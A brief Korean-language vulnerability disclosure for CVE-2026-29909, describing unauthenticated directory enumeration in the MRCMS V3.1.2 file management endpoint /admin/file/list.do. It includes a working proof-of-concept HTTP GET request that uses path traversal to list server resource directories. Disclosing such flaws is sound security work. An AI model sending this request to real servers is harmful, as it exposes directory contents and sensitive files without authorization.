
MRCMS V3.1.2용 인증되지 않은 디렉터리 열거 PoC로, /admin/file/list.do의 누락된 인증을 악용하여 서버 디렉터리 구조와 민감한 파일을 노출합니다.
CVE-2026-29909
MRCMS V3.1.2에는 파일 관리 모듈에 인증되지 않은 디렉터리 열거 취약점이 존재합니다. /admin/file/list.do 엔드포인트는 인증 제어 및 적절한 입력 검증이 부족하여, 원격 공격자가 자격 증명 없이 서버의 디렉터리 내용을 열거할 수 있습니다.
GET /admin/file/list.do?path=../../../src/main/resources/ HTTP/1.1
Host: target-server
발견자: zyh